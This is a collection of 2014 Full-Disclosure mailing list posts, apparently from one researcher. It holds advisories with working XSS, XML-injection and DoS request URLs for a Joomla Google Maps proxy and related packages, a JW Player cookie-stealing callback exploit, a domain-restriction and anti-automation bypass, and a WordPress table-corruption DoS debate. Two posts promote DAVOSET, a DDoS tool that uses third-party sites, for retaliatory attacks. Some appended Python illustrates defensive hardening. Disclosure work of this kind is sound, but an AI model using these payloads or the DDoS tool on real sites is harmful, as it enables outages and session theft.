[Full-disclosure] DAVOSET v.1.1.8
Hello participants of the Mailing List.

After the public release of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html), I've made the next update of the software. On the 7th of March DAVOSET v.1.1.8 was released - DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/). This is the Bots Strike Back Edition. As the world knows, last week Putin declared war against Ukraine (https://soundcloud.com/mustlive/war-against-ukraine). So the army of bots will come in handy to strike back against the dictator.

Video demonstration of DAVOSET: http://www.youtube.com/watch?v=RKi35-f346I

Download DAVOSET v.1.1.8: http://websecurity.com.ua/uploads/2014/DAVOSET_v.1.1.8.rar

In the new version, support for the security bypass in the Google Maps plugin was added, new services were added to the full list of zombies, and non-working services were removed from the lists of zombies. Also, a BYPASS method was added to the format of the list of zombie-servers. It allows bypassing the protection of web applications, such as the domain restriction in Google Maps. About this vulnerability in the Google Maps plugin for Joomla I wrote earlier (http://seclists.org/fulldisclosure/2014/Feb/53).

In total there are 170 zombie-services in the list, which are ready to strike against dictatorship.

Best wishes & regards, MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiple vulnerabilities in Joomla-Base
Hello list!

These are Denial of Service, XML Injection, Cross-Site Scripting, Full path disclosure and Insufficient Anti-automation vulnerabilities in Joomla-Base. This is a package of Joomla with different plugins (with their vulnerabilities). These vulnerabilities are in the Google Maps plugin for Joomla, which is used in this package. In 2013-2014 I wrote advisories about multiple vulnerabilities in the Google Maps plugin (http://securityvulns.ru/docs29645.html, http://securityvulns.ru/docs29670.html and http://seclists.org/fulldisclosure/2014/Feb/53).

- Affected products: -

Vulnerable are all versions of Joomla-Base which include this plugin. After my informing, the developer removed this plugin from his package (https://github.com/pabloarias/Joomla-Base/issues/1).

- Affected vendors: -

Pablo Arias
https://github.com/pabloarias/Joomla-Base

-- Details: --

Denial of Service (WASC-10):

http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=google.com

Besides conducting a DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks using DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html).

XML Injection (WASC-23):

http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=site2/xml.xml

It's possible to include external xml-files. Which also can be used for an XSS attack:

XSS via XML Injection (WASC-23):

http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=site2/xss.xml

File xss.xml:

XSS xmlns="http://www.w3.org/1999/xhtml";>alert(document.cookie)

Cross-Site Scripting (WASC-08):

http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E

Full path disclosure (WASC-13):

http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php

This is possible with corresponding PHP settings, when warnings are shown.

Insufficient Anti-automation (WASC-21):

In this functionality there is no reliable protection from automated requests. Also in my third advisory concerning the Google Maps plugin, I wrote about a security bypass for the built-in domain restriction functionality and described a method of bypassing the protection against automated requests introduced in version 3.2. So even the latest version is vulnerable to IAA.

Best wishes & regards, Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] Multiple vulnerabilities in JoomLeague for Joomla
Hello list!

These are Denial of Service, XML Injection, Cross-Site Scripting, Full path disclosure and Insufficient Anti-automation vulnerabilities in the JoomLeague plugin for Joomla. These vulnerabilities are in the Google Maps plugin for Joomla, which is used in this plugin. In 2013-2014 I wrote advisories about multiple vulnerabilities in the Google Maps plugin (http://securityvulns.ru/docs29645.html, http://securityvulns.ru/docs29670.html and http://seclists.org/fulldisclosure/2014/Feb/53).

- Affected products: -

Vulnerable are JoomLeague 2.1.12 plugin for Joomla and previous versions. And the package joomleague-2-komplettpaket, which includes the JoomLeague plugin.

- Affected vendors: -

JoomLeague Developers
http://www.joomleague.net
https://github.com/diddipoeler/joomleague-2-komplettpaket

-- Details: --

Denial of Service (WASC-10):

http://site/components/com_joomleague/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=google.com

Besides conducting a DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks using DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html).

XML Injection (WASC-23):

http://site/components/com_joomleague/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=site2/xml.xml

It's possible to include external xml-files. Which also can be used for an XSS attack:

XSS via XML Injection (WASC-23):

http://site/components/com_joomleague/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=site2/xss.xml

File xss.xml:

XSS http://www.w3.org/1999/xhtml";>alert(document.cookie)

Cross-Site Scripting (WASC-08):

http://site/components/com_joomleague/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E

Full path disclosure (WASC-13):

http://site/components/com_joomleague/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php

This is possible with corresponding PHP settings, when warnings are shown.

Insufficient Anti-automation (WASC-21):

In this functionality there is no reliable protection from automated requests. Also in my third advisory concerning the Google Maps plugin, I wrote about a security bypass for the built-in domain restriction functionality and described a method of bypassing the protection against automated requests introduced in version 3.2. So even the latest version is vulnerable to IAA.

Best wishes & regards, Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
Re: [Full-disclosure] DoS via tables corruption in WordPress
Hello Timothy!

As I wrote in my first letter with the description of my video, and additionally in my answer to Aris (http://seclists.org/fulldisclosure/2014/Feb/115), in 2009 WordPress developers made a fix for this DoS vulnerability - without thanking me and without mentioning me as the researcher of this vulnerability/attack (as they have done a lot since 2007). So you can consider my attack, described in my article "Attack via tables corruption in MySQL" (http://websecurity.com.ua/articles/attack-via-tables-corruption-in-mysql/), as "not related to WP" and "not a hole in WP", but WordPress developers from December 2009 officially considered this hole/attack as related to WP. They did it 7 months after my advisory in 2009, so they read it and made a fix (a lame one, which can't be considered a fix, because table repair is not automated) - which is exactly confirmation that the developers considered such an attack possible. So since the release of WP 2.9 this DoS hole in WP is officially confirmed, but still not fixed correctly, so all versions of WP are affected.

then some mitigation is called for

Note that WP developers did take some steps to protect against the tables corruption attack. It's weak, but they did it in December 2009. IPB developers haven't done such protection, but since IPB 1.x they have had database management inside the admin panel (with a tables fix function), which can be used for mitigation - as I wrote in my 2012 advisory. So IPB devs don't want to do anything more about that and WP devs made only the first step, but both of them need to make the protection better (table repair must be automated). As does any developer of any web application with MyISAM tables.

Note one important thing. You and anybody else should ask me questions in time. If I wrote an advisory and published it at multiple sites in May 2009, then the questions should have been asked at that time. Or when I wrote a new advisory in 2012 about the weakness of that fix and the possibility to use it for an attack, or when I published my article in 2012. All people who wanted to ask me did it in 2009 and 2012. And not asking me now, when I have almost civil war in my country and only in the previous three days near 100 people were killed and hundreds were injured. Read the news, my dear, about the situation in Ukraine.

* Will an error running a database statement lead to WordPress showing the install process to visitors?

Only for special tables. Which vary for different versions of WP (and those tables are harder to corrupt than others). That case at perishablepress.com was the only one which I know about, which happened on a web site in the Internet, with showing of the install process. Which allows conducting an engine reinstall. All other web sites, where I found tables corruption in Invision Power Bulletin (since 2007) and WordPress (since 2009), had issues with tables that led only to DoS. So the main attack scenario of the tables corruption attack is DoS of the web site, and only in a lucky case, as with that site, it can be used for such an attack scenario as engine reinstall.

* What additional privileges do they then have?

In the case of DoS - none. The web site will just be non-working. In the case of engine reinstall - the attacker will have admin privileges after the reinstall of WP.

* Could this cause a non-exploitable db bug to become exploitable?

No. It only affects web applications. In that rare case, which happened at perishablepress.com, table corruption allowed reinstalling the engine, so there can be cases (varying for different webapps) when it will allow an attack beyond DoS ("non-exploitable" in the normal state). In my video I showed a DoS attack. And it's the first video in the Internet which shows a live tables corruption attack (in real time). And I made a 100% reproducible DoS for that site.

Best wishes & regards, MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

- Original Message -
From: Timothy Goddard
To: na...@wordpress.org ; mustl...@websecurity.com.ua
Cc: full-disclosure@lists.grok.org.uk
Sent: Tuesday, February 11, 2014 10:03 PM
Subject: Re: [Full-disclosure] DoS via tables corruption in WordPress

I agree that the DoS part is vague and not a vulnerability in WordPress. However, my question would be:

* Will an error running a database statement lead to WordPress showing the install process to visitors?
* What additional privileges do they then have?
* Could this cause a non-exploitable db bug to become exploitable?

If the answers there lean towards yes, lots and yes, then some mitigation is called for.

Sent from Samsung Mobile

Original message
From: Andrew Nacin
Date:
To: MustLive
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] DoS via tables corruption in WordPress

On Mon, Feb 10, 2014 at 8:02 AM, MustLive wrote:
There is DoS vulnerability in WordPress,

As pointed out by others, this is unbearably vague. But it's also invalid. Your &qu
[Full-disclosure] XSS and CS vulnerabilities in DSMS
Hello list!

There are Cross-Site Scripting and Content Spoofing vulnerabilities in DSMS. This is a commercial CMS. It's used in particular at the government site dsmsu.gov.ua - the web site of the Ministry of Youth and Sport of Ukraine. There are also other vulnerabilities in the system, about which I've informed the developers. None of the vulnerabilities were fixed.

- Affected products: -

Vulnerable are all versions of DSMS.

- Affected vendors: -

Strebul studio
http://strebul.com

-- Details: --

Cross-Site Scripting (WASC-08):

http://site/templates/default/js/jwplayer/player.swf?playerready=alert(document.cookie)

http://site/templates/default/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

Cross-Site Scripting (WASC-08):

If on the site, on a page with jwplayer.swf (player.swf), there is the possibility (via HTML Injection) to include JS code with a callback function - and there are 19 such functions in total - then it's possible to conduct an XSS attack. I.e. JS callbacks can be used for an XSS attack.

Example of exploit:

...
jwplayer("container").setup({
    flashplayer: "jwplayer.swf",
    file: "1.flv",
    autostart: true,
    height: 300,
    width: 480,
    events: {
        onReady: function() { alert(document.cookie); },
        onComplete: function() { alert(document.cookie); },
        onBufferChange: function() { alert(document.cookie); },
        onBufferFull: function() { alert(document.cookie); },
        onError: function() { alert(document.cookie); },
        onFullscreen: function() { alert(document.cookie); },
        onMeta: function() { alert(document.cookie); },
        onMute: function() { alert(document.cookie); },
        onPlaylist: function() { alert(document.cookie); },
        onPlaylistItem: function() { alert(document.cookie); },
        onResize: function() { alert(document.cookie); },
        onBeforePlay: function() { alert(document.cookie); },
        onPlay: function() { alert(document.cookie); },
        onPause: function() { alert(document.cookie); },
        onBuffer: function() { alert(document.cookie); },
        onSeek: function() { alert(document.cookie); },
        onIdle: function() { alert(document.cookie); },
        onTime: function() { alert(document.cookie); },
        onVolume: function() { alert(document.cookie); }
    }
});

Content Spoofing (WASC-12):

The swf-file of JW Player accepts arbitrary addresses in the parameters file and image, which allows spoofing the content of the flash - i.e. by setting addresses of video (audio) and/or image files from another site.

http://site/templates/default/js/jwplayer/player.swf?file=1.flv&backcolor=0xFF&screencolor=0xFF

http://site/templates/default/js/jwplayer/player.swf?file=1.flv&image=1.jpg

The swf-file of JW Player accepts arbitrary addresses in the parameter config, which allows spoofing the content of the flash - i.e. by setting the address of a config file from another site (the parameters file and image in the xml-file accept arbitrary addresses). For loading the config file from another site it needs to have crossdomain.xml.

http://site/templates/default/js/jwplayer/player.swf?config=1.xml

1.xml

1.flv 1.jpg

The swf-file of JW Player accepts arbitrary addresses in the parameter playlistfile, which allows spoofing the content of the flash - i.e. by setting the address of a playlist file from another site (the parameters media:content and media:thumbnail in the xml-file accept arbitrary addresses). For loading the playlist file from another site it needs to have crossdomain.xml.

http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss

http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss&playlist.position=right&playlist.size=200

1.rss

http://search.yahoo.com/mrss/";> Example playlist Video #1 First video. Video #2 Second video.

Timeline:

2013.11.04 - informed administrators of the government site. No response, no fix.
2013.11.13 - announced at my site.
2013.11.18 - informed developers about vulnerabilities in the CMS and at dsmsu.gov.ua. They promised to fix the holes in the CMS and at the web site, but didn't do it.
2014.02.15 - disclosed at my site (http://websecurity.com.ua/6860/).

Best wishes & regards, MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] DAVOSET v.1.1.7
Hello participants of the Mailing List.

After the public release of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html), I've made the next update of the software. On the 13th of February DAVOSET v.1.1.7 was released - DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/). This is the New Hope Edition.

Video demonstration of DAVOSET: http://www.youtube.com/watch?v=RKi35-f346I

Download DAVOSET v.1.1.7: http://websecurity.com.ua/uploads/2014/DAVOSET_v.1.1.7.rar

In the new version, new services were added to the full list of zombies, support for hours in the timer was added, and support for the Google Maps 3 plugin was improved. About vulnerabilities in the Google Maps plugin for Joomla I have written many times over the last two years.

In total there are 151 zombie-services in the list, which are ready to strike against an ill-intentioned regime.

Best wishes & regards, MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
Re: [Full-disclosure] DoS via tables corruption in WordPress
Hi Harry!

The links to my advisories and article about the attack via tables corruption in MySQL, and the link to the proof video, were in my first letter. The links are also in the description of the video, which I posted on Saturday on YouTube. Aris didn't mention those links in his letter (he didn't quote the original letter). And I was trying not to repeat the same links all the time. So these links can be found in the list. But if you want, here they are - to make things a bit easier.

Link to my 2009 post, where I described my conception of the attack on the example of WordPress (http://perishablepress.com/important-security-fix-for-wordpress/comment-page-5/#comment-71666) and posted the same advisory at my site. Also read my answers to questions there in the comments.

Link to my 2012 article "Attack via tables corruption in MySQL" (http://websecurity.com.ua/articles/attack-via-tables-corruption-in-mysql/).

Link to the video with my WordPress DoS exploit (http://www.youtube.com/watch?v=kwv5ni_qxXs). A proof of this vulnerability in WP and of the attack described in the article.

Best wishes & regards, MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

- Original Message -
From: "Harry Metcalfe"
To: "MustLive"
Cc:
Sent: Wednesday, February 12, 2014 4:51 PM
Subject: Re: [Full-disclosure] DoS via tables corruption in WordPress

Hi MustLive,

Just to make things a bit easier, would you mind replying with links for the perishablepress.com article, the 2009 advisory and the 2012 article?

Many thanks!

Harry

On 12/02/2014 14:44, MustLive wrote:

Hello Aris!

First of all, I wrote all the required information in my post in May 2009 at perishablepress.com. And I answered all questions (including lame ones and scepticism) concerning the attack on WordPress, which I proposed to the owner of that site as an explanation of why his site was hacked at that time (via engine reinstall). And since I developed the conception of this attack back in 2007 (for IPB, because I have a forum on this engine) and made advisories for WordPress and IPB concerning the possibility of attacks via table corruption, in 2012 I wrote a detailed article "Attack via tables corruption in MySQL" (http://websecurity.com.ua/articles/attack-via-tables-corruption-in-mysql/), which I published at my site and in the WASC mailing list. So all aspects of the attacks were described and all questions were answered by me many years ago. Those who didn't read that information should read it, those who have questions should read my 2009 advisory and 2012 article - AND THEY WILL HAVE NO QUESTIONS. And for those who are sceptical about database corruption attacks - that it's not possible to make a reliable attack with a 100% chance of conducting the attack on a real web site - for those I made an exploit and a video of its use on a web site in the Internet. So unbelievers should watch the video and believe.

I have yet to determine if that was an accident or an attack.

I'm sure that your case is an accident, not an attack. Since everyone, from the time I proposed this attack in 2009 until now, didn't believe in the possibility of this attack and considered it "conceptual". I.e. it was "luck" for the attackers to hack perishablepress.com using tables corruption that particular day, and it would not happen again to anybody, as the sceptics thought. My video should change their minds. First of all, it's a hard attack and I didn't release my exploit (and will not release it in the near future), and I'm not aware of anyone's exploit in public in the 5 years since my 2009 advisory. So you have the exact combination of hardware and software (MySQL and WordPress) that makes your site vulnerable to this attack. Most web sites on WordPress can sleep tight until some day an attacker tests their site for "crashability" and makes them vulnerable to this attack.

For all the nuances of attacking tables in MySQL, read my article to understand your case and create a scenario of a possible attack on your site to trigger a table crash, which leads to DoS. Concerning your case I'll write more information to you privately. You need to find out the exact way of crashing tables at the site to prevent the "accident" from turning into an "attack".

Note that WP developers later in 2009, after reading that publication of mine and thinking for 7 months, made a fix for this DoS in WP 2.9. But they made table repair manual, not automated, so it can't be considered a fix, since the tables can be crashed and the site will be DoSed - until the admin finds it and manually repairs the tables. So WP developers made a lame fix for this DoS attack, as I wrote in my 2012 advisory, and WP is still vulnerable (and I also described a DoS vulnerability in the protection functionality against this DoS attack).

If Mustlive has any real and concrete information (URL, exploit code), please share with us.
Re: [Full-disclosure] DoS via tables corruption in WordPress
Hello Aris!

First of all, I wrote all the required information in my post in May 2009 at perishablepress.com. And I answered all questions (including lame ones and scepticism) concerning the attack on WordPress, which I proposed to the owner of that site as an explanation of why his site was hacked at that time (via engine reinstall). And since I developed the conception of this attack back in 2007 (for IPB, because I have a forum on this engine) and made advisories for WordPress and IPB concerning the possibility of attacks via table corruption, in 2012 I wrote a detailed article "Attack via tables corruption in MySQL" (http://websecurity.com.ua/articles/attack-via-tables-corruption-in-mysql/), which I published at my site and in the WASC mailing list. So all aspects of the attacks were described and all questions were answered by me many years ago. Those who didn't read that information should read it, those who have questions should read my 2009 advisory and 2012 article - AND THEY WILL HAVE NO QUESTIONS. And for those who are sceptical about database corruption attacks - that it's not possible to make a reliable attack with a 100% chance of conducting the attack on a real web site - for those I made an exploit and a video of its use on a web site in the Internet. So unbelievers should watch the video and believe.

I have yet to determine if that was an accident or an attack.

I'm sure that your case is an accident, not an attack. Since everyone, from the time I proposed this attack in 2009 until now, didn't believe in the possibility of this attack and considered it "conceptual". I.e. it was "luck" for the attackers to hack perishablepress.com using tables corruption that particular day, and it would not happen again to anybody, as the sceptics thought. My video should change their minds. First of all, it's a hard attack and I didn't release my exploit (and will not release it in the near future), and I'm not aware of anyone's exploit in public in the 5 years since my 2009 advisory. So you have the exact combination of hardware and software (MySQL and WordPress) that makes your site vulnerable to this attack. Most web sites on WordPress can sleep tight until some day an attacker tests their site for "crashability" and makes them vulnerable to this attack.

For all the nuances of attacking tables in MySQL, read my article to understand your case and create a scenario of a possible attack on your site to trigger a table crash, which leads to DoS. Concerning your case I'll write more information to you privately. You need to find out the exact way of crashing tables at the site to prevent the "accident" from turning into an "attack".

Note that WP developers later in 2009, after reading that publication of mine and thinking for 7 months, made a fix for this DoS in WP 2.9. But they made table repair manual, not automated, so it can't be considered a fix, since the tables can be crashed and the site will be DoSed - until the admin finds it and manually repairs the tables. So WP developers made a lame fix for this DoS attack, as I wrote in my 2012 advisory, and WP is still vulnerable (and I also described a DoS vulnerability in the protection functionality against this DoS attack).

If Mustlive has any real and concrete information (URL, exploit code), please share with us.

All the real and concrete information is in my 2009 advisory and 2012 article. With the addition of my 2014 video (I was planning to make it in 2012, but found time only this month). So reading and watching them will help. For now I'll not release any exploits (no need to create a risk either for that lame site in my video or for all other WordPress sites, since WP developers haven't fixed the hole properly), but I'll do it in the future.

Best wishes & regards, MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

- Original Message -
From: "Aris Adamantiadis"
To: "Andrew Nacin" ; "MustLive"
Cc:
Sent: Tuesday, February 11, 2014 3:46 PM
Subject: Re: [Full-disclosure] DoS via tables corruption in WordPress

Le 11/02/14 09:34, Andrew Nacin a écrit :

Aris mentions he experienced corruption in his own WordPress setup. It's most likely the options table simply crashed, not as a result of any particular exploit. This is, after all, why MySQL has a REPAIR command (and why we have a script for users to use).

This happened again last night. The mysql corruption was caused by an OOM random kill (thanks linux) that chose the mysql daemon as a victim. The cause of the OOM was either wordpress or piwik, probably made possible through apache misconfiguration (too many children). I have yet to determine if that was an accident or an attack.

If Mustlive has any real and concrete information (URL, exploit code), please share with us.

Aris
[Full-disclosure] DoS via tables corruption in WordPress
Hello participants of the Mailing List.

There is a DoS vulnerability in WordPress, about which I wrote in 2009 (http://websecurity.com.ua/3152/, in English http://perishablepress.com/important-security-fix-for-wordpress/comment-page-5/#comment-71666), which allows conducting a DoS attack or a reinstall of the engine (depending on the corrupted table). And in 2012 (http://websecurity.com.ua/5774/, in English http://securityvulns.ru/docs27968.html) I wrote that the developers hadn't fixed it, even though they said so, and that they had made a new DoS vulnerability.

In April 2012 I wrote my article "Attack via tables corruption in MySQL" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2012-May/008363.html) and in July made an English version of the article (http://websecurity.com.ua/articles/attack-via-tables-corruption-in-mysql/). There I described vulnerabilities in WordPress and IPB which are based on my conception of the attack via tables corruption.

On Saturday I published a video with my WordPress DoS exploit (http://www.youtube.com/watch?v=kwv5ni_qxXs), which shows this DoS attack on one security site on WordPress. Vulnerable are all versions of WordPress. This video is a proof of this vulnerability in WP and of the attack described in the article.

Best wishes & regards, MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
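The recurring complaint in this thread (the original post above and the replies to Aris, Harry and Timothy) is that once a MyISAM table is marked as crashed the site stays down until somebody runs REPAIR TABLE by hand; WordPress only ships a manual repair page (wp-admin/maint/repair.php, enabled with the WP_ALLOW_REPAIR constant). The Python below is an added example and is not code from WordPress, IPB or the poster: it shows the two pieces an automated repair step needs, a classifier for the MySQL error numbers that identify a crashed MyISAM table, and a routine that turns the rows returned by CHECK TABLE into the REPAIR TABLE statements to run. The CHECK TABLE rows, the schema name "blog" and the table names are constructed for the example; a real deployment would feed in the rows returned by its database driver.

```python
# MySQL error numbers that mean a MyISAM table's data or index file is
# damaged; every query against the table fails with one of these until
# REPAIR TABLE (or a restore) is done.  Descriptions from `perror`.
CRASHED_TABLE_ERRNOS = {
    126: "Index file is crashed",
    127: "Record-file is crashed",
    144: "Table is crashed and last repair failed",
    145: "Table was marked as crashed and should be repaired",
}


def needs_repair(errno):
    """True when a query error is a crashed-table error, not an SQL error."""
    return errno in CRASHED_TABLE_ERRNOS


def action_for_error(errno, engine):
    """Decide what an application should do after catching a DB error.
    REPAIR TABLE only covers MyISAM-family tables; InnoDB corruption and a
    failed previous repair (144) both need a restore instead."""
    if not needs_repair(errno):
        return "none"
    if errno == 144:
        return "restore-from-backup"
    if engine.upper() == "MYISAM":
        return "repair"
    return "restore-from-backup"


def _quote(qualified_name):
    # `db`.`table` quoting; backticks inside a name are doubled.
    return ".".join("`%s`" % p.replace("`", "``") for p in qualified_name.split("."))


def repair_plan(check_rows):
    """check_rows: rows of CHECK TABLE, as (Table, Op, Msg_type, Msg_text).
    A table is broken if it has any 'error' row or a 'status' row whose
    text is not OK; warnings alone (e.g. an unclean close) are left alone.
    Returns sorted REPAIR TABLE statements so a cron job is deterministic."""
    broken = set()
    for table, _op, msg_type, msg_text in check_rows:
        kind = msg_type.lower()
        if kind == "error" or (kind == "status" and msg_text.strip().upper() != "OK"):
            broken.add(table)
    return ["REPAIR TABLE %s;" % _quote(t) for t in sorted(broken)]


def repair_succeeded(repair_rows):
    """REPAIR TABLE reports success as a final ('status', 'OK') row;
    anything else means the table needs to be restored from backup."""
    if not repair_rows:
        return False
    _table, _op, msg_type, msg_text = repair_rows[-1]
    return msg_type.lower() == "status" and msg_text.strip().upper() == "OK"


# Constructed sample in the shape of CHECK TABLE output (not real data).
SAMPLE_CHECK_ROWS = [
    ("blog.wp_options", "check", "error",
     "Table './blog/wp_options' is marked as crashed and should be repaired"),
    ("blog.wp_options", "check", "status", "Corrupt"),
    ("blog.wp_posts", "check", "status", "OK"),
    ("blog.wp_comments", "check", "warning",
     "1 client is using or hasn't closed the table properly"),
    ("blog.wp_comments", "check", "status", "OK"),
    ("blog.wp_postmeta", "check", "status", "Corrupt"),
    ("blog.wp_users", "check", "status", "OK"),
]


if __name__ == "__main__":
    for stmt in repair_plan(SAMPLE_CHECK_ROWS):
        print(stmt)
```

A production job would run `CHECK TABLE` over the application's tables on a schedule, pass the result rows to `repair_plan`, execute the statements, and alert when `repair_succeeded` returns False; the application's error handler can call `action_for_error` on the driver's errno to trigger the same job immediately instead of waiting for an administrator to notice the outage.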
[Full-disclosure] New vulnerabilities in Google Maps plugin for Joomla
Hello list!

Last year I wrote about multiple vulnerabilities in the Google Maps plugin. After my informing, the developer fixed them, but this year I found new vulnerabilities. These are Denial of Service and Insufficient Anti-automation vulnerabilities in the Google Maps plugin for Joomla.

- Affected products: -

Vulnerable are Google Maps plugin v3.2 for Joomla and previous versions. Except versions 2.19, 2.20 and 3.1 of the plugin, where the proxy functionality was removed. I've informed the developer about these holes. Now he is working on a new version of the plugin. He hasn't released Google Maps v3.2 yet, only put it on his site. And after fixing all reported vulnerabilities, he will release it to the public.

- Affected vendors: -

Mike Reumer
http://extensions.joomla.org/extensions/maps-a-weather/maps-a-locations/maps/1147

-- Details: --

Denial of Service (WASC-10):

It's possible to conduct attacks on target sites where the domain of the web site with the Google Maps plugin is used as a subdomain. For old versions of the plugin "plugin_googlemap2_proxy.php" is used and for new versions of the plugin "plugin_googlemap3_kmlprxy.php" is used.

E.g. requests for an attack on the site wordpress.com via the script at web site "site":

http://site/plugins/system/plugin_googlemap2_proxy.php?url=site.wordpress.com

http://site/plugins/system/plugin_googlemap3/plugin_googlemap3_kmlprxy.php?url=site.wordpress.com

This is needed to bypass the security filter (domain restriction) if it's turned on. Thus it's possible to attack web sites which allow arbitrary subdomains.

Besides conducting a DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks using DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-July/008879.html).

Insufficient Anti-automation (WASC-21):

Last year in Google Maps plugin v3.2 the developer made protection from automated attacks, but it's not effective. And the above-mentioned domain check can be bypassed. In this functionality there is no reliable protection from automated requests.

To bypass the protection for accessing this script (which appeared in version 3.2) it's needed to set the referer, cookie and token. The referer is the current site, the cookie is set by the site (Joomla) itself and the token can be found on a page of the site which uses the plugin (and it's set in the URL). This data can be taken from the site automatically.

Referer: http://site
Cookie: dc9023a0ff4f8a00f9b2f4e7600c17f4=69c59f0263b70f9343e0a75a93bd44a0

I have disclosed it at my site (http://websecurity.com.ua/6987/).

Best wishes & regards, MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
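The proxy scripts in the Joomla-Base, JoomLeague and Google Maps advisories above fetch whatever the url parameter names, and the domain restriction is defeated by a host such as site.wordpress.com that merely contains the configured name; the DSMS advisory's file, image, config and playlistfile parameters have the same shape of problem. The Python below is an added example, not the plugin's or JW Player's code: the advisories do not show the plugin's check, so weak_domain_check is an assumed substring-style check written to reproduce the described bypass, and strict_domain_check is the hardened form (parse the URL, require http(s), refuse embedded credentials, exact allow-list match). RequestLimiter shows the kind of anti-automation control that does not rely on Referer, cookie or page token, all of which the advisory notes a bot can fetch. The host name "site" and the client addresses are constructed inputs.

```python
import time
from collections import defaultdict, deque
from urllib.parse import urlsplit


def _normalize(url):
    """The proxy scripts take a bare "host/path" value in the url parameter,
    so a value without a scheme is treated as http:// before parsing."""
    return url if "://" in url else "http://" + url


def weak_domain_check(url, site_host):
    """Assumed substring-style restriction (illustration, not the plugin's
    code): the configured domain only has to occur inside the requested
    host, so site_host="site" accepts "site.wordpress.com"."""
    host = urlsplit(_normalize(url)).hostname or ""
    return site_host.lower() in host.lower()


def strict_domain_check(url, allowed_hosts):
    """Hardened check: exact, case-insensitive match of the whole host
    against an explicit allow-list; no prefix, suffix or substring logic."""
    parts = urlsplit(_normalize(url))
    if parts.scheme not in ("http", "https"):
        return False
    if parts.username is not None or parts.password is not None:
        return False  # "http://site@wordpress.com/" really targets wordpress.com
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return False
    return host in {h.lower().rstrip(".") for h in allowed_hosts}


class RequestLimiter:
    """Per-client sliding-window limit keyed on something the client does
    not control (its source address), unlike Referer, cookies and page
    tokens.  The clock is a parameter so the behaviour is testable."""

    def __init__(self, max_requests, window_seconds):
        self.max_requests = max_requests
        self.window = window_seconds
        self._hits = defaultdict(deque)

    def allow(self, client_ip, now=None):
        now = time.time() if now is None else now
        hits = self._hits[client_ip]
        while hits and now - hits[0] >= self.window:
            hits.popleft()          # drop timestamps outside the window
        if len(hits) >= self.max_requests:
            return False
        hits.append(now)
        return True


def proxy_request_allowed(url, client_ip, limiter, allowed_hosts, now=None):
    """The decision a KML/XML proxy endpoint should make before fetching
    anything: host allow-listed AND client under its rate limit."""
    return strict_domain_check(url, allowed_hosts) and limiter.allow(client_ip, now)


if __name__ == "__main__":
    # Constructed inputs mirroring the advisory's "site.wordpress.com" case.
    print(weak_domain_check("site.wordpress.com", "site"))              # True (bypass)
    print(strict_domain_check("site.wordpress.com", ["site"]))          # False
    print(strict_domain_check("http://site/maps/points.kml", ["site"]))  # True
```

Note that the allow-list check only decides which hosts the proxy may contact; a proxy that is still reachable by anyone on the Internet remains a DoS amplifier against the allow-listed hosts themselves, which is why the rate limit (or, better, removing the proxy as versions 2.19, 2.20 and 3.1 did) is needed as well.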
[Full-disclosure] Vulnerabilities in Contact Form 7 for WordPress
Hello list! I want to inform you about vulnerabilities in Contact Form 7 plugin for WordPress. These are Code Execution via Arbitrary File Uploading vulnerabilities (two attack vectors). This is addition to previous Code Execution vulnerability in Contact Form 7 (http://seclists.org/fulldisclosure/2013/Nov/182). - Affected products: - Vulnerable are Contact Form 7 3.5.3 and previous versions. After my informing developer fixed previous hole in version 3.5.3, but refused to fix these two attack vectors, so all versions of Contact Form 7 are vulnerable. The attacks are possible only on earlier versions of WordPress, but in the last versions the WP itself blocks attacks via semicolon and double extensions. So developer doesn't want to make the protection in his plugin itself (the WP must do the work) and he doesn't take into account possibilities that somebody could run plugin on older versions of engine or in the future versions of WP the protection code could be changed. So I recommend to use this plugin (since 3.5.3) only with the last versions of WordPress. - Affected vendors: - Contact Form 7 http://contactform7.com -- Details: -- Code Execution (WASC-31): Attack is going via uploader. For code execution it's needed to use bypass methods for IIS and Apache. It's possible to use semicolon in file name (1.asp;.txt) on IIS or double extension (1.php.txt) on Apache. The attack 